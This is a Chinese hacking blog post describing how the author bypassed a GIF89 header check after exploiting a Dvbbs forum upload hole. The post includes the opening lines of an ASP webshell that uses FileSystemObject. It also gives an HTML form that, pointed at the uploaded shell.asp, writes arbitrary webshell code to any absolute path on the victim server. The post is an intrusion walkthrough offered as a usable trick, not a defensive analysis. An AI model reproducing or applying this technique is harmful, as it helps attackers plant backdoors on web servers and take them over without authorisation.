曾经有那么几次,我遇上了动网论坛的上传漏洞,可是我却一直没有成功,很郁闷的说,上传成功了显示出来的是个红叉.........
那个时候我放弃了,今天又让我遇到了一次,并且是漏洞多多的一个站......上传漏洞上传了一个shell.asp显示的却是红色的图标,而shell.asp就是通常写马的脚本了..
后来我通过另一个漏洞得到了webshell,至于如何得到,暂时先不公布...后来我看到在我上传的shell.asp的开头却变成了如下的东东:
GIF89<% dim objFSO %>
<% dim fdata %>
<% dim objCountFile %>
<% on error resume next %>
.........代码省略........
明显就是这个GIF89搞的鬼,以为是图片不给执行,我靠!经过和小组的兄弟们讨论,其实不叫讨论,是我一直没想过这个问题,而他们一般都或多或少的知道,哎,看来是有了差距了哈哈.....偶要努力呀,落后了三个月!!
把那个shell.asp用FG下载回来,其实ASP文件你用FG或者其它类似的东东下载回来了都是经过解析后的,和静态页面没区别的....但是我就是想利用它哈哈,解析了偶再提交..下载回来后改一下后辍名为html代码如下:
GIF89<form action=' 'method=post>保存文件的<font color=red>绝对路径(包括文件名:如D:\web\x.asp):</font><input type=text name=syfdpath width=32 size=50><br>本文件绝对路径d:\wwwroot\XXXXX\wwwroot\dvbbs\shell.asp<br>输入马的内容:<textarea name=cyfddata cols=80 rows=10 width=32></textarea><input type=submit value=保存></form>
把action后面的值改为你要提交的地址,我这里就是http://xxxxx/dvbbs/shell.asp了,已经处理过了........再保存,再打开再直接写马提交,OK.一切正常了吧哈哈........原来突破就是这么的简单,我怎么当没想到呢...
后记,在php上传这类的时候,暂时还没办法这样欺骗,php里有专门的函数处理图片的,郁闷呀,如果who有方法突破,一定要告诉偶呀!!!!
好了,不说了,只是个小技巧而已,而且利用也非常有限,哈哈,闪了!!